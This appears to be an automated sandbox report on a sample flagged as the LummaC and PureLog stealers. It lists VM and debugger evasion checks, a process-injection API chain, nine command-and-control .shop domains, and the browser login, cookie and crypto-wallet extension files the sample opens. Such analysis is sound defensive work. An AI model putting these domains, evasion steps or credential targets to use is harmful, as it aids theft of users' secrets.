Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\user\Desktop\Script.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController

Query firmware table information (likely to detect VMs)

Source: C:\Users\user\Desktop\Script.exe

System information queried: FirmwareTableInformation

Jump to behavior

Source: C:\Users\user\Desktop\Script.exe	Memory allocated: F70000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Script.exe	Memory allocated: 2970000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Script.exe	Memory allocated: 27C0000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\Script.exe

Window / User API: threadDelayed 6978

Jump to behavior

Source: C:\Users\user\Desktop\Script.exe TID: 6608	Thread sleep time: -90000s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\Script.exe TID: 5512	Thread sleep count: 6978 > 30			Jump to behavior

Source: C:\Users\user\Desktop\Script.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: C:\Users\user\Desktop\Script.exe	Last function: Thread delayed
Source: C:\Users\user\Desktop\Script.exe	Last function: Thread delayed

Source: Amcache.hve.5.dr	Binary or memory string: VMware
Source: Amcache.hve.5.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.5.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.5.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.5.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.5.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.5.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.5.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: Script.exe, 00000002.00000002.3253212983.000000000162C000.00000004.00000020.00020000.00000000.sdmp, Script.exe, 00000002.00000002.3253340942.0000000001668000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Amcache.hve.5.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.5.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.5.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.5.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.5.dr	Binary or memory string: vmci.sys
Source: Amcache.hve.5.dr	Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Script.exe, 00000002.00000002.3253427446.00000000016C6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ,"e":1,"d":"HbYc1janKuml4iIL5MOuD7Ddk\/wJqAf0ti0l2bCRTIhQ7GTWN6cq6aHiIgvkw64PsN2T\/AmoB\/T2LSXZsJFMiB22HNY2pyrppeIiC+TDrg+w3ZP8CagH9LYtJdnIkUyIE6mm2DYTIySEWiNHKeL6Z9mus4x7x2CG10AFutH\/Iudpln6zFtVfh4WLTCugjP0v3bL3mSeMB\/TmaCXZ\/JBIiCnedLE2pyrppeIiCwTDrC673J38CbgH9LYnJdmwkUyIHaYc1ja3Kuml4iIL5MOuH7DNk\/wJqgf0sC0l2bCRTIgbthzWNqcq6aWyIgvkx64PsN2T\/AuoR\/G2LTXZsIFMiB22DNY2tyrppeIiC\/TDrg+w3ZP8CagH9AQPJdmMkUyIHbYc1janKuml4iIL5MOuD7Ddk\/wJqAf0tm0l2eiRTIgdthzWNqcq6aXiIgvkw64PsN2T\/AmoB\/S2LSXZsJFMiB22HNY2pyrppeIiC+TDrg+U\/pP8PagH9LYtJdmwkUyIHbYc1janKuml4iIL5MOuD56p9oR9qAf0fyIl2bCBTIgdphzWNqMq6aXiIgvkw64PsN2T\/CmoB5SYX0G4xPBMiDGyHNY2hyrppeQiC+TXrg+w3ZP8CagH9LYtJdnwkUzIM9J9olenKum94iIL5POuD7Dfk\/wJsgf0ti0l2bCRTIgdthzWdqcqKYuQR2eLoK4P6N2T\/AnoB\/S2LyXZsI1MiB22HNY2pyrppeIiC6TDrk2w3ZP8CagH9LYtJdmwkUyIHbYc1janKuml4iIL5MOuD7Ddk\/wJqAf0ti0l2bCRTIgdthzWNqcq6aXiIgvkw64PsN2T\/AmoB\/S2LSXZsJFMiB22HNY2pyrppeIiC+TDrg+w3ZP8CagH9LYtJdmwkUyIHbYc1janKuml4iIL5MOuD7Ddk\/wJqAf0ti0l2bCRTIgdthzWNqcq6aXiIgvkw64PsN2T\/AmoB\/S2LSXZsJFMiB22HNY2pyrppeIiC+TDrg+w3ZP8CagH9LYtJdmwkUyIHbYc1janKuml4iIL5MOuD7Ddk\/wJqAf0ti0l2bCRTIgdthzWNqcq6aXiIgvkw64PsN2T\/AmoB\/S2LSXZsJFMiB22HNY2pyrppeIiC+TDrg+w3ZP8CagH9LYtJdmwkUyIHbYc1janKuml4iIL5MOuD7Ddk\/wJqAf0ti0l2bCRTIgdthzWNqcq6aXiIgvkw64PsN2T\/AmoB\/S2LSXZsJFMiB22HNY2pyrppeIiC+TDrg+w3ZP8CagH9LYtJdmwkUyIHbYc1janKuml4iIL5MOuD7Ddk\/wJqAf0ti0l2bCRTIgdthzWNqcq6aXiIgvkw64PsN2T\/AmoB\/S2LSXZsJFMiB22HNY2pyrppeIiC+TDrg+w3ZP8CagH9LYtJdmwkUyISOVLgLVLImrZxgIK60ZeD7DdogqClTfXtj2u9OCyTJj2pHqwUMFMx6r9pgvkw64P2txsKfZ\/PjLC20\/ZT4R4qx2mmRY5I4XppeJIBhvWgiywzRY8Biye9LYtrB\/gblnAPrYMU\/aormGl4iKCJ0raK7TsZc3JzmHauTKh2bCRTIiedhiwtZsZ6SiUIH4Xk8QNT8jT3wm4jvCSqOWt\/G54rOKjVPU2t3y6LCRy45TDrg8zGZ+q4W8H9Lau4d05UrO8OUkJmhWnOm1+ljf08euND6Aip9hjpfjhjg4lyTVROYHigjgpI+MJ6bUdVi\/gPLtDk92DAxyMJPSm0vJQdnh+d+JJpNc2pypqYep8VL+ebAOwEV8wxWTLOHrh6RV8XYBETuFKXXKDOmLRxjaAqOe2hnpUXAveK8j3OzEcmnF4Tgv\/SpURN3crGyIU0a5jNSfWYTQaKoBvgAJFS4BeRhiVC\/xIHR7AZCudou2UB+5Lpk\/ugsg\/xWTLOHrh6RV8XYBESOVLgLVLOmL5xgbM4OeuD7DdLFQrqBdNHg8lyTlPKjN\/tpUkv9MO7ar9pgvkw64Pv2q5moxFCHDaLCXZM1NOC9y0kZA0wRM0qqfSBKEToUp\/0iTlby3cgWGo09Y01k2IHTtS3rvhfmDhxiqxPTxR8FvK9ZpvzmHauTKh2bCRTIiedx6UtV3VnZ7tlRJpgH5pMyWZjuIlRGvQrt3DwnPBy6LQny4vqK0GpeIiBFMoyIxLlJx44KgH9DXQaqxzGIdhTknjKQ3TDu0utgYDku2huP4jHr3ZIdR3TicqW4dus3eQ96Nf5STS86pgC\/QbPC3OL1RAf\/CyCHat0tomvyZGBVxmlQW1XyDmJ+jd9BtO77A5DhAEE6eFCEjS2lpxDsVbnk8G2bRJ1BZaWdz0GzwlIrDtk+xvzmHauTKh2bCRTIh7NWDLNKensqeX14gfl9oRgR31f3WuU\/Q7bSesRRxAlk1JaPI69sL8ruIiiCDP\/VrmNbkC9leEMLqo5VK8tUM+1Awd1janJaxvay4vb4+KB7+YW3XCQXoKSdKsElnnsnfiP9c\/WVnVFi6WBi\/rdKBpNRSceI6pB\/Q\/3c7uv44MiErjTz7uWtUWJiYujiRIoiu\/a1pGCKgH9Llo71C8tUPN7bmr2L9XTGxsaVYvwMwqQ7Hdk3XDIcSSuTKh2bCRTIh7NebnQp0lXvbgocjmpSvdxTMaP2\/OYdq5MqHZsJFMiHs15eVCvSVe7uChyOalK8bFM3r0CKgHkrkyodmwkUyIkP1aW0WlkMul4iLg7cyxDzMbkbZ94ghDiKBKFtYSsYFvWJG5icGpFL+RN4gbitovMyLcidJDHpK5MqHZsJFMiJ5JcKI9JO12w2HdEZYByJ8zJ5rzjuD4C0nGItav1UyIlHiX+zKXKvmcIVQj63Tt8T2VQ3\/wogh2k9LaJj3Z8wvkrBNUL1jVFiYivYgc2aGNvSJsAwYfAXn+\/aYgup7OduNJ41t+GKkQv+2g+Ro8UYxwQhAEE6e
Source: Amcache.hve.5.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.5.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.5.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.5.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.5.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.5.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.5.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.5.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.5.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.5.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.5.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.5.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.5.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.5.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.5.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563

Source: C:\Users\user\Desktop\Script.exe

API call chain: ExitProcess graph end node

graph_2-14259

Source: C:\Users\user\Desktop\Script.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\Script.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Users\user\Desktop\Script.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\Desktop\Script.exe

Code function: 2_2_004408C0 LdrInitializeThunk,

2_2_004408C0

Source: C:\Users\user\Desktop\Script.exe	Code function: 0_2_02977F5D mov edi, dword ptr fs:[00000030h]		0_2_02977F5D
Source: C:\Users\user\Desktop\Script.exe	Code function: 0_2_029780DA mov edi, dword ptr fs:[00000030h]		0_2_029780DA

Source: C:\Users\user\Desktop\Script.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Contains functionality to inject code into remote processes

Source: C:\Users\user\Desktop\Script.exe

Code function: 0_2_02977F5D GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessW,CreateProcessW,VirtualAlloc,VirtualAlloc,GetThreadContext,Wow64GetThreadContext,ReadProcessMemory,ReadProcessMemory,VirtualAllocEx,VirtualAllocEx,GetProcAddress,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,Wow64SetThreadContext,ResumeThread,ResumeThread,

0_2_02977F5D

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\Script.exe

Memory written: C:\Users\user\Desktop\Script.exe base: 400000 value starts with: 4D5A

Jump to behavior

LummaC encrypted strings found

Source: Script.exe, 00000000.00000002.2036187411.0000000003979000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: cloudewahsj.shop
Source: Script.exe, 00000000.00000002.2036187411.0000000003979000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: rabidcowse.shop
Source: Script.exe, 00000000.00000002.2036187411.0000000003979000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: noisycuttej.shop
Source: Script.exe, 00000000.00000002.2036187411.0000000003979000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: tirepublicerj.shop
Source: Script.exe, 00000000.00000002.2036187411.0000000003979000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: framekgirus.shop
Source: Script.exe, 00000000.00000002.2036187411.0000000003979000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: wholersorie.shop
Source: Script.exe, 00000000.00000002.2036187411.0000000003979000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: abruptyopsn.shop
Source: Script.exe, 00000000.00000002.2036187411.0000000003979000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: nearycrepso.shop
Source: Script.exe, 00000000.00000002.2036187411.0000000003979000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: fancywaxxers.shop

Source: C:\Users\user\Desktop\Script.exe

Process created: C:\Users\user\Desktop\Script.exe "C:\Users\user\Desktop\Script.exe"

Jump to behavior

Source: C:\Users\user\Desktop\Script.exe	Queries volume information: C:\Users\user\Desktop\Script.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Script.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Script.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\Script.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: Amcache.hve.5.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.5.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.5.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.5.dr	Binary or memory string: MsMpEng.exe

Source: C:\Users\user\Desktop\Script.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: Script.exe PID: 1480, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Yara detected PureLog Stealer

Source: Yara match	File source: Script.exe, type: SAMPLE
Source: Yara match	File source: 0.0.Script.exe.480000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Script.exe.3979550.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Script.exe.3979550.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.2001576225.0000000000482000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2036187411.0000000003979000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Found many strings related to Crypto-Wallets (likely being stolen)

Source: Script.exe, 00000002.00000002.3253340942.0000000001668000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/Electrum-LTC
Source: Script.exe, 00000002.00000002.3253340942.0000000001668000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/ElectronCash
Source: Script.exe, 00000002.00000002.3253340942.0000000001668000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: window-state.json
Source: Script.exe, 00000002.00000002.3253340942.0000000001668000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/Ethereum
Source: Script.exe, 00000000.00000002.2036187411.0000000003979000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: set_UseMachineKeyStore

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\Script.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn	Jump to behavior
Source: C:\Users\user\Desktop\Script.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh	Jump to behavior
Source: C:\Users\user\Desktop\Script.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp	Jump to behavior
Source: C:\Users\user\Desktop\Script.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cert9.db	Jump to behavior
Source: C:\Users\user\Desktop\Script.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\Script.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj	Jump to behavior
Source: C:\Users\user\Desktop\Script.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic	Jump to behavior
Source: C:\Users\user\Desktop\Script.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\Script.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge	Jump to behavior
Source: C:\Users\user\Desktop\Script.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\Script.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd	Jump to behavior
Source: C:\Users\user\Desktop\Script.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp	Jump to behavior
Source: C:\Users\user\Desktop\Script.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd	Jump to behavior
Source: C:\Users\user\Desktop\Script.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\Desktop\Script.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo	Jump to behavior
Source: C:\Users\user\Desktop\Script.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf	Jump to behavior
Source: C:\Users\user\Desktop\Script.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh	Jump to behavior
Source: C:\Users\user\Desktop\Script.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg	Jump to behavior
Source: C:\Users\user\Desktop\Script.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\Script.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm	Jump to behavior
Source: C:\Users\user\Desktop\Script.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd	Jump to behavior
Source: C:\Users\user\Desktop\Script.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa	Jump to behavior
Source: C:\Users\user\Desktop\Script.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb	Jump to behavior
Source: C:\Users\user\Desktop\Script.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc	Jump to behavior
Source: C:\Users\user\Desktop\Script.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb	Jump to behavior
Source: C:\Users\user\Desktop\Script.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Script.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi	Jump to behavior
Source: C:\Users\user\Desktop\Script.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad	Jump to behavior
Source: C:\Users\user\Desktop\Script.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak	Jump to behavior
Source: C:\Users\user\Desktop\Script.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac	Jump to behavior
Source: C:\Users\user\Desktop\Script.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf	Jump to behavior
Source: C:\Users\user\Desktop\Script.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno	Jump to behavior
Source: C:\Users\user\Desktop\Script.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj	Jump to behavior
Source: C:\Users\user\Desktop\Script.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\formhistory.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\Script.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp	Jump to behavior
Source: C:\Users\user\Desktop\Script.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\Script.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil	Jump to behavior
Source: C:\Users\user\Desktop\Script.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma	Jump to behavior
Source: C:\Users\user\Desktop\Script.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch	Jump to behavior
Source: C:\Users\user\Desktop\Script.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm	Jump to behavior
Source: C:\Users\user\Desktop\Script.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk	Jump to behavior
Source: C:\Users\user\Desktop\Script.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\Script.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm	Jump to behavior
Source: C:\Users\user\Desktop\Script.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\Desktop\Script.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa	Jump to behavior
Source: C:\Users\user\Desktop\Script.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld	Jump to behavior
Source: C:\Users\user\Desktop\Script.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef	Jump to behavior
Source: C:\Users\user\Desktop\Script.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb	Jump to behavior
